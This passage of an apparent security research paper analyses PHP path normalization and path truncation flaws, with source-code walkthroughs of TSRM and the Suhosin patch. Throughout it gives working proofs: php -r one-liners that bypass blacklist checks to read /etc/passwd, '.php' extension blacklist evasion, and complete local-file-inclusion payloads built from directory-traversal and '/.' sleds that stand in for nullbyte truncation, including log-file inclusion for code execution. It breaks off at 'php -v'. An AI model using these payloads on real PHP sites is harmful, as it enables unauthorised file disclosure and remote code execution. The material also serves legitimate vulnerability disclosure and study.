To be perfectly clear, I was not aware of the path truncation issue (damn!) and in my mind the use for this vulnerability was different. If you read the discussion in [4], it was about checks. While ereg*() functions can be poisoned by nullbytes, preg_*() and string functions like substr() are binary safe.
So if there is a "blacklist" or negative check you can bypass it with path normalization:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -r 'if($argv[1]!="/etc/passwd")include($argv[1]);' '/etc/passwd' | head -n1
(doesn't work, as expected)
$ php -r 'if($argv[1]!="/etc/passwd")include($argv[1]);' '/etc//passwd' | head -n1
root:x:0:0:root:/root:/bin/bash
$ php -r 'if($argv[1]!="/etc/passwd")include($argv[1]);' '/etc///passwd' | head -n1
root:x:0:0:root:/root:/bin/bash
$ php -r 'if($argv[1]!="/etc/passwd")include($argv[1]);' '/etc/./passwd' | head -n1
root:x:0:0:root:/root:/bin/bash
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

But path normalization in PHP allows you to do something that cat(1) can't. To explain this a better example is needed; first let's see what would happen if only "classic" path normalization were possible:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -r 'if(substr($argv[1], -6, 6)!="passwd")include($argv[1]);' '/etc/passwd' | head -n1
(doesn't work, as expected)
$ php -r 'if(substr($argv[1], -6, 6)!="passwd")include($argv[1]);' '/etc//passwd' | head -n1
(doesn't work, as expected, because it still ends in passwd)
$ php -r 'if(substr($argv[1], -6, 6)!="passwd")include($argv[1]);' '/etc/./passwd' | head -n1
(doesn't work, as expected, because it still ends in passwd)
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

A check like this can't be directly bypassed (it could be if the attacker were able to create a link to /etc/passwd, for example), but that level of access becomes unnecessary with the trailing "/" or "/." attack vector we are presenting:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -r 'if(substr($argv[1], -6, 6)!="passwd")include($argv[1]);' '/etc/passwd/.' | head -n1
root:x:0:0:root:/root:/bin/bash <- WORKS!
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Now that the usefulness of this path normalization issue, specific to PHP, is clear, it's time for a more concrete example: bypassing blacklist file extension checking. The case is code equivalent to the following (for example an online file editor script):

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";' 'ciccio.txt'
ciccio.txt
$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";' 'ciccio.php'
(doesn't work, as expected, because the extension is blacklisted)
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Instead, using our attack vector, the check is bypassed (and the filesystem function will normalize the path in a way that makes the attack succeed):

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";' 'ciccio.php/'
ciccio.php/
$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";' 'ciccio.php/.'
ciccio.php/.
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Thanks to the discussion with kuza55, evilaliv3 and Wisec, 3 main uses of this attack vector were identified:

- Blacklist bypass on write functions (file editors, file writing, etc.)
- Blacklist bypass on read functions (source disclosure, etc.)
- Regular expression and IDS/IPS signature evasion

The wrong assumption was that this behaviour was filesystem dependent; as said, it turned out to depend on which PHP version (patched vs. non-patched) was installed. Kuza55 also remembered that blacklist based editors and uploads can be evaded anyway by uploading ".php.xyz" files (thanks to the Apache mod_mime mapping feature [6] necessary for mod_negotiation's MultiViews), but that's another story.
IV) PHP filesystem functions path normalization attack details

From first empirical tests we discovered that the universal path normalization vector is "/."; these tests were later expanded with a deeper analysis of the PHP source code.

PHP defines some stream wrapper functions and makes them available for use by higher level functions like include, require, require_once, file_get_contents, fopen and others. In this paper only include/require behaviour is going to be analyzed.

The code analysis started with a simple breakpoint on open calls:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ gdb /usr/bin/php
(gdb) break open
Function "open" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (open) pending.
(gdb) r -r '@include("/etc/passwd/.");'
Starting program: /usr/bin/php -r '@include("/etc/passwd/.");'
[..]
[Switching to Thread 0xb7f2e6c0 (LWP 7264)]

Breakpoint 1, 0x41606820 in open () from /lib/libpthread.so.0
(gdb) bt
#0  0x41606820 in open () from /lib/libpthread.so.0
#1  0x082142c7 in _php_stream_fopen ()
#2  0xbff4c8cc in ?? ()
#3  0x09d20050 in ?? ()
#4  0x0000003b in ?? ()
#5  0x085e2504 in php_stream_stdio_ops ()
#6  0x00000000 in ?? ()
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

_php_stream_fopen(), defined in main/streams/plain_wrapper.c, was a good function to start the code analysis with, as it contains this interesting code:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
streams/plain_wrapper.c-893: if ((realpath = expand_filepath(filename, NULL TSRMLS_CC)) == NULL) {
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Attention was then directed to the expand_filepath() function, defined in main/fopen_wrappers.c, and finally to expand_filepath_ex(), defined in the same file, which also contains the snprintf() responsible for the path truncation discussed in the next chapter.
After some raw (e.g. printf+gdb) debugging of expand_filepath_ex() the faulty function was finally identified: virtual_file_ex().

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
main/fopen_wrappers.c-656: if (virtual_file_ex(&new_state, filepath, NULL, CWD_FILEPATH)) {
main/fopen_wrappers.c-657:     free(new_state.cwd);
main/fopen_wrappers.c-658:     return NULL;
main/fopen_wrappers.c-659: }
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Yeah! virtual_file_ex() is the faulty function! It's defined at line 482 of TSRM/tsrm_virtual_cwd.c. Let's see where the error is. The interesting part of the function is at line 619 of TSRM/tsrm_virtual_cwd.c:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
TSRM/tsrm_virtual_cwd.c-619: tok=NULL;
TSRM/tsrm_virtual_cwd.c-620: ptr = tsrm_strtok_r(path_copy, TOKENIZER_STRING, &tok);
TSRM/tsrm_virtual_cwd.c-621: while (ptr) {
TSRM/tsrm_virtual_cwd.c-622:     ptr_length = strlen(ptr);
[..]
TSRM/tsrm_virtual_cwd.c-624:     if (IS_DIRECTORY_UP(ptr, ptr_length)) {
[..]
TSRM/tsrm_virtual_cwd.c-651:     } else if (!IS_DIRECTORY_CURRENT(ptr, ptr_length)) {
[..]
TSRM/tsrm_virtual_cwd.c-717:     }
TSRM/tsrm_virtual_cwd.c-718:     ptr = tsrm_strtok_r(NULL, TOKENIZER_STRING, &tok);
TSRM/tsrm_virtual_cwd.c-719: }
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

TOKENIZER_STRING, IS_DIRECTORY_UP and IS_DIRECTORY_CURRENT are defined elsewhere in the source:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ grep "#define TOKENIZER" */* -n
TSRM/tsrm_virtual_cwd.c-82:#define TOKENIZER_STRING "/\\"
TSRM/tsrm_virtual_cwd.c-103:#define TOKENIZER_STRING "/\\"
TSRM/tsrm_virtual_cwd.c-106:#define TOKENIZER_STRING "/"
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The define at line 82 is for WIN32, the one at line 103 is for NETWARE, the last is for all the other systems. The macros IS_DIRECTORY_UP and IS_DIRECTORY_CURRENT are defined as below.
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ grep -P "#define (IS_DIRECTORY_UP *\(|IS_DIRECTORY_CURRENT *\()" */* -n -C2 | head -6
TSRM/tsrm_virtual_cwd.c-91:#define IS_DIRECTORY_UP(element, len) \
TSRM/tsrm_virtual_cwd.c-92:     (len >= 2 && !php_check_dots(element, len))
[..]
TSRM/tsrm_virtual_cwd.c-94:#define IS_DIRECTORY_CURRENT(element, len) \
TSRM/tsrm_virtual_cwd.c-95:     (len == 1 && element[0] == '.')
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Although the code is simple to understand, here are the reasons for the normalization error. The if/else-if construct does not handle the case in which both conditions fail, and tsrm_strtok_r() splits the path at every "/". Each resulting piece is analyzed in turn; for a "." piece both conditions are false, so at every "while" cycle that piece is simply skipped and nothing is appended. This is why "./" is "neutral" and will not appear in the normalized path. The analysis for "/." is identical.

Now it remains to see why, using the Suhosin patch, a sequence of "/" becomes a working attack vector. We did our tests using suhosin-patch-5.2.8 [7]. In the patch, at line 34, there is a definition of a new php_realpath() function, and at line 1746 a "#define realpath php_realpath". So the patch replaces the entire vanilla realpath() function with its own implementation. This function, called by virtual_file_ex() at line 561, does some checks on the path and returns a resolved path.
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
TSRM/tsrm_virtual_cwd.c-561: if (!realpath(path, resolved_path)) {
TSRM/tsrm_virtual_cwd.c-562:     if (use_realpath == CWD_REALPATH) {
TSRM/tsrm_virtual_cwd.c-563:         return 1;
TSRM/tsrm_virtual_cwd.c-564:     }
TSRM/tsrm_virtual_cwd.c-565:     goto no_realpath;
TSRM/tsrm_virtual_cwd.c-566: }
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Let's compare the behaviour with and without the Suhosin patch using this testcase:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -r 'include("/etc/passwd/////////");'
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

With vanilla sources realpath() fails (returns NULL) and the code jumps to no_realpath using a goto statement: PHP will use the raw path (just the path variable, without any change) instead of the resolved path. This means that "/etc/passwd////////////" will be used and the testcase will fail with:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
Warning: include(/etc/passwd////////////): failed to open stream: Not a directory
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Instead, with Suhosin patched sources the function succeeds, so PHP will use the resolved_path produced by Suhosin's realpath(), which normalizes the string to "/etc/passwd". Suhosin chooses to remove trailing "/" and that's a dangerous error (it does not prevent the "/." vector from working and opens another hole).

V) PHP filesystem functions path truncation attack

The attack disclosed by barbarianbob is really amazing and makes a different use of the previously presented vector (path normalization). He discovered in [1] that the path is "truncated" at a certain point. This is really amazing because it means that when including a filename longer than a certain length only the first part, the one that fits the buffer, will reach the real syscalls. Why is this of help?
Think of code similar to the following:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The attacker controls the central part of the included filename; since there is a fixed prefix, RFI (Remote File Inclusion) cannot be performed (it would require a protocol/URI handler to be given to PHP, plus the relatively new php.ini directives "allow_url_fopen" and "allow_url_include" set to "On"). Commonly this can be exploited with a path traversal attack trying to include an attacker-controlled .php file (and this requires some ability to control/create the target file, including its filename).

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
For example:
?library=../../../home/www.uploadsite_on_shared_hosting.tld/www/static/attack

Will evaluate to:
include("includes/../../../home/www.uploadsite_on_shared_hosting.tld/www/static/attack.php");
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

This is not a common situation, especially when doing LFI2RCE attacks as shown in [5] (Local File Inclusion to Remote Code Execution attacks are those where an LFI can be turned into an RCE by finding a way to put an attacker-controlled payload into an existing file on the target filesystem, like a logfile, and then including it). Normally, to mount a successful LFI attack the attacker must control the end of the path; since filesystem functions in PHP are normally not binary safe, a nullbyte can be used.
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
For example:
?library=../../../var/log/something.log%00

Will evaluate to:
include("includes/".urldecode("../../../var/log/something.log%00").".php");

That is equivalent to:
include("includes/../../../var/log/something.log");
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The common problem with this is that magic_quotes escapes nullbytes, as addslashes() is implicitly called on all GPC and SERVER inputs.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -r 'echo addslashes(chr(0));'
\0

That evaluates to something like:

$ php -r 'echo ("includes/".addslashes(urldecode("../../../var/log/something.log%00")).".php");'
includes/../../../var/log/something.log\0.php
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As a side note, magic_quotes_gpc will be removed in the upcoming PHP 6 release.

Now let's come back to path truncation: what if there's the possibility to make the appended string slip out of the buffer? This does not happen because of C's nullbyte string termination, as incorrectly stated in [2] and [3], but because of the following code:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
# grep "snprintf(trypath, MAXPATHLEN, \"%s/%s\", ptr, filename);" * -R
main/streams/plain_wrapper.c:    snprintf(trypath, MAXPATHLEN, "%s/%s", ptr, filename);
main/fopen_wrappers.c:           snprintf(trypath, MAXPATHLEN, "%s/%s", ptr, filename);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As you can see PHP, instead of raising an error, silently truncates the string: snprintf() keeps at most MAXPATHLEN-1 chars plus the terminating NUL, and its return value is never checked.
The length at which the path is truncated was correctly investigated in [3]; the related code is the following:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
/main/php.h:
#ifndef MAXPATHLEN
# ifdef PATH_MAX
#  define MAXPATHLEN PATH_MAX
# elif defined(MAX_PATH)
#  define MAXPATHLEN MAX_PATH
# else
#  define MAXPATHLEN 256
# endif
#endif

/win32/param.h
#ifndef MAXPATHLEN
# define MAXPATHLEN _MAX_PATH
#endif
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

MAXPATHLEN is 4096 (PATH_MAX) on most systems.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
strace -e open php -r 'include("includes/".addslashes(urldecode("../../../tmp/something".str_repeat("foo_", 1200)))."/append.php");'
open("/usr/tmp/somethingfoo_foo_foo_foo_foo_foo_[OMIT]foo_foo_f", O_RDONLY) = -1 ENAMETOOLONG (File name too long)
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

This results in ENAMETOOLONG because a single path component is longer than the kernel's NAME_MAX (255 bytes on Linux); the limit can be overcome by using directories instead.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
strace -e open -s 100000 php -r 'include("includes/".addslashes(urldecode("../../../tmp/something".str_repeat("foo/", 1200)))."/append.php");'
open("/usr/tmp/somethingfoo/foo/foo/foo/foo/foo/[OMIT]foo/foo/f", O_RDONLY) = -1 ENOENT (No such file or directory)
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

This alone can't help mount an attack, because somebody would have to be able to create a deeply nested directory structure and the offending file, with an arbitrary filename, at the end. An attacker with such ability could simply create a file that fits the initial needs of the appended string. This is where the path normalization vector comes to help: it can be combined with the path truncation issue to achieve a greater goal (nullbyte emulation on magic_quotes_gpc enabled systems).
The sled after the payload (the directory traversal path and the target filename) must be one of the path normalization attack vectors already seen (e.g. "/" or "/." repeated many times). The idea is to fill the buffer up to MAXPATHLEN with something that will disappear before the actual open() syscall.

Slash normalization does happen on vanilla PHP: the slashes count as chars in the truncation code but are normalized to a single "/", which causes the ENOTDIR error.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("//", 2027)."append.inc");' 2>&1 | grep "^open(\"/tmp"
open("/tmp/teest/ap", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/tmp/teest/app", O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("//", 2027)."/append.inc");' 2>&1 | grep "^open(\"/tmp"
open("/tmp/teest/a", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/tmp/teest/ap", O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("//", 2027)."//append.inc");' 2>&1 | grep "^open(\"/tmp"
open("/tmp/teest/", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/tmp/teest/a", O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("//", 2027)."///append.inc");' 2>&1 | grep "^open(\"/tmp"
open("/tmp/teest/", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/tmp/teest/", O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("//", 2027)."////append.inc");' 2>&1 | grep "^open(\"/tmp"
open("/tmp/teest/", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/tmp/teest/", O_RDONLY) = -1 ENOTDIR (Not a directory)
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Instead, "/." normalization is transparent and no char is appended to the resulting path.
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("/.", 2027)."append.inc");' 2>&1 | grep "^open(\"/tmp"
open("/tmp/teest/.ap", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/tmp/teest/.app", O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("/.", 2027)."/append.inc");' 2>&1 | grep "^open(\"/tmp"
open("/tmp/teest/a", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/tmp/teest/ap", O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("/.", 2027)."/.append.inc");' 2>&1 | grep "^open(\"/tmp"
open("/tmp/teest", O_RDONLY) = 3
(it works, bingo!)
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Remember that:

- On vanilla PHP versions the last char of the path must be a dot, for the reasons explained above.
- On patched PHP versions adjacent slashes are normalized differently and work like the universal "/." path normalization vector.

VI) PHP filesystem functions path truncation attack details

Some of you may have noted that there are two open() calls ("/tmp/teest/a" and "/tmp/teest/ap") that show different arithmetic (one has only one char of the appended string, the other two). Others may also ask why a relative path that starts with a directory that doesn't exist really works. This is because of the many (evil) normalization instructions and routines implemented in PHP, in conjunction with a feature: include_path.

include_path is a PHP feature similar to PATH on Unix systems: when an include, include_once, require or require_once call is made and the file is relative (i.e. doesn't begin with a slash, or a drive letter on Windows), a lookup will happen in every path defined in include_path. include_path is defined both at ./configure time and in php.ini, or at runtime with ini_set("include_path", ...), and defaults to ".:". Most distributions and vendors ship PHP with different settings.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
(on Gentoo)
include_path = ".:/usr/share/php5:/usr/share/php"
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The important thing when using the universal normalization vector is that at least one include_path entry has an even length and at least one an odd length: after truncation the same "/." sled then ends in "." for one candidate and in "/" for the other, and only the former normalizes cleanly to the target. The following is a complete strace of what happens:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ strace php -r 'include("a/../../../../etc/passwd".str_repeat("/.", 2027)."/.append.inc");' 1>/dev/null
getcwd("/home/antani"..., 4096) = 13
time(NULL) = 1232724170
lstat64("/usr", {st_mode=S_IFDIR|0755, st_size=560, ...}) = 0
lstat64("/usr/share", {st_mode=S_IFDIR|0755, st_size=9984, ...}) = 0
lstat64("/usr/share/php5", {st_mode=S_IFDIR|0755, st_size=88, ...}) = 0
lstat64("/usr/share/php5/a", 0x5edafcdc) = -1 ENOENT (No such file or directory)
open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory)
time(NULL) = 1232724170
lstat64("/usr", {st_mode=S_IFDIR|0755, st_size=560, ...}) = 0
lstat64("/usr/share", {st_mode=S_IFDIR|0755, st_size=9984, ...}) = 0
lstat64("/usr/share/php", {st_mode=S_IFDIR|0755, st_size=72, ...})  = 0
lstat64("/usr/share/php/a", 0x5edafcdc) = -1 ENOENT (No such file or directory)
open("/etc/passwd", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0
read(3, "root:x:0:0:root:/root:/bin/bash\nb"..., 8192) = 3379
read(3, ""..., 8192) = 0
read(3, ""..., 8192) = 0
close(3) = 0
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As we are going to demonstrate, this attack is only possible thanks to the include_path feature and a specially crafted payload able to trigger it.
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ strace php -r 'include("etc/passwd/.");' 1>/dev/null
(relative lookup in cwd, i.e. open of /home/antani/etc/passwd, then include_path lookups)

$ strace php -r 'include("etc/passwd".str_repeat("/.", 2067)."/.append.inc");' 1>/dev/null
(no relative lookup (!!), then include_path lookups)

$ strace php -r 'include("../../../etc/passwd".str_repeat("/.", 2067)."/.append.inc");' 1>/dev/null
(complete failure)

$ strace php -r 'include("a/../../../etc/passwd".str_repeat("/.", 2067)."/.append.inc");' 1>/dev/null
(non-existing relative directory "a" in the include_path dirs, but ends up opening /usr/share/etc/passwd because it doesn't traverse enough)
getcwd("/home/antani"..., 4096) = 13
time(NULL) = 1232728270
lstat64("/usr", {st_mode=S_IFDIR|0755, st_size=560, ...}) = 0
lstat64("/usr/share", {st_mode=S_IFDIR|0755, st_size=9984, ...}) = 0
lstat64("/usr/share/php5", {st_mode=S_IFDIR|0755, st_size=88, ...}) = 0
lstat64("/usr/share/php5/a", 0x5a9460cc) = -1 ENOENT (No such file or directory)
open("/usr/share/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory)
time(NULL) = 1232728270
lstat64("/usr", {st_mode=S_IFDIR|0755, st_size=560, ...}) = 0
lstat64("/usr/share", {st_mode=S_IFDIR|0755, st_size=9984, ...}) = 0
lstat64("/usr/share/php", {st_mode=S_IFDIR|0755, st_size=72, ...}) = 0
lstat64("/usr/share/php/a", 0x5a9460cc) = -1 ENOENT (No such file or directory)
open("/usr/share/etc/passwd", O_RDONLY) = -1 ENOENT (No such file or directory)

$ strace php -r 'include("a/../../../../etc/passwd".str_repeat("/.", 2067)."/.append.inc");' 1>/dev/null
(non-existing relative directory "a" in the include_path dirs, correctly opens /etc/passwd)
[..]
open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory)
[..]
open("/etc/passwd", O_RDONLY) = 3
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

So the payload has to start with a non-existing directory, continue with the traversal sled, point to the path to include and end with the normalization/truncation sled. Please refer to section VIII (POC and attack code) for more compact POC code.

Here is a final demonstration of how this truncation issue works, thanks to include_path and to the length of the paths defined in it:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ cat phpini_1
[PHP]
include_path = ".:/tmp/1234:/tmp/123"

$ cat phpini_2
[PHP]
include_path = ".:/tmp/123:/tmp/1234"

$ strace php -n -c phpini_1 -r 'include("a/../../../../etc/passwd".str_repeat("/.", 2027)."/.append.inc");'
getcwd("/home/antani"..., 4096) = 13
time(NULL) = 1232730352
lstat64("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
lstat64("/tmp/1234", 0x5b3ad18c) = -1 ENOENT (No such file or directory)
open("//etc/passwd/.appen", O_RDONLY) = -1 ENOTDIR (Not a directory)
time(NULL) = 1232730352
lstat64("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
lstat64("/tmp/123", 0x5b3ad18c) = -1 ENOENT (No such file or directory)
open("//etc/passwd/.append", O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace php -n -c phpini_2 -r 'include("a/../../../../etc/passwd".str_repeat("/.", 2027)."/.append.inc");'
getcwd("/home/antani"..., 4096) = 13
time(NULL) = 1232730409
lstat64("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
lstat64("/tmp/123", 0x5f5a491c) = -1 ENOENT (No such file or directory)
open("//etc/passwd/.append", O_RDONLY) = -1 ENOTDIR (Not a directory)
time(NULL) = 1232730409
lstat64("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
lstat64("/tmp/1234", 0x5f5a491c) = -1 ENOENT (No such file or directory)
open("//etc/passwd/.appen", O_RDONLY) = -1 ENOTDIR (Not a directory)
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

From our analysis it turned out that the path truncation attack can work only if include_path contains at least one absolute path; this means that while vendor releases are mostly vulnerable, systems with the default (commented out) include_path configuration are not affected at all.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ strace php -n -d include_path=".:" -r 'include("a/../../../../etc/passwd".str_repeat("/.", 2067)."/.append.inc");'
(doesn't work)

$ strace php -n -d include_path=".:/tmp" -r 'include("a/../../../../etc/passwd".str_repeat("/.", 2067)."/.append.inc");'
(works)
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Path truncation on the latest PHP is therefore still possible, and all the LFI exploits that rely on the nullbyte technique can be rewritten to use the techniques exposed in this paper.

VII) The facts

The following section includes some technical examples for both vanilla and patched PHP.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
strace -e getcwd,lstat64,open php -r 'file_get_contents("runme");';
getcwd("/home/antani"..., 4096) = 13
lstat64("/home", {st_mode=S_IFDIR|0755, st_size=336, ...}) = 0
lstat64("/home/antani", {st_mode=S_IFDIR|0770, st_size=3216, ...}) = 0
lstat64("/home/antani/runme", {st_mode=S_IFREG|0660, st_size=4109, ...}) = 0
open("/home/antani/runme", O_RDONLY) = 3
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
strace -e getcwd,lstat64,open php -r 'file_get_contents("runme/");';
getcwd("/home/antani"..., 4096) = 13
lstat64("/home", {st_mode=S_IFDIR|0755, st_size=336, ...}) = 0
lstat64("/home/antani", {st_mode=S_IFDIR|0770, st_size=3216, ...}) = 0
lstat64("/home/antani/runme", {st_mode=S_IFREG|0660, st_size=4109, ...}) = 0
open("/home/antani/runme/", O_RDONLY) = -1 ENOTDIR (Not a directory)

Warning: file_get_contents(runme/): failed to open stream: Not a directory in Command line code on line 1
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
strace -e getcwd,lstat64,open php -r 'file_get_contents("runme/.");';
getcwd("/home/antani"..., 4096) = 13
lstat64("/home", {st_mode=S_IFDIR|0755, st_size=336, ...}) = 0
lstat64("/home/antani", {st_mode=S_IFDIR|0770, st_size=3216, ...}) = 0
lstat64("/home/antani/runme", {st_mode=S_IFREG|0660, st_size=4109, ...}) = 0
open("/home/antani/runme", O_RDONLY) = 3
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As visible, with PHP opening "runme/." or "runme/./." is the same as opening "runme". This leads to interesting considerations and security issues. I informally spoke about this to Kuza55 and Wisec in April 2007 [4] but the analysis was incorrect. We also made some checks to see if this was filesystem dependent and found that it is not:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
#!/bin/sh
mkdir "/fs_""$1""_mount"
dd if=/dev/zero of="fs_""$1" bs=1M count=10
mkfs -t "$1" "fs_""$1"
mount "fs_""$1" "/fs_""$1""_mount" -t "$1" -o loop
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Test and analysis for "PHP 5.2.8-pl1-gentoo"

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -v
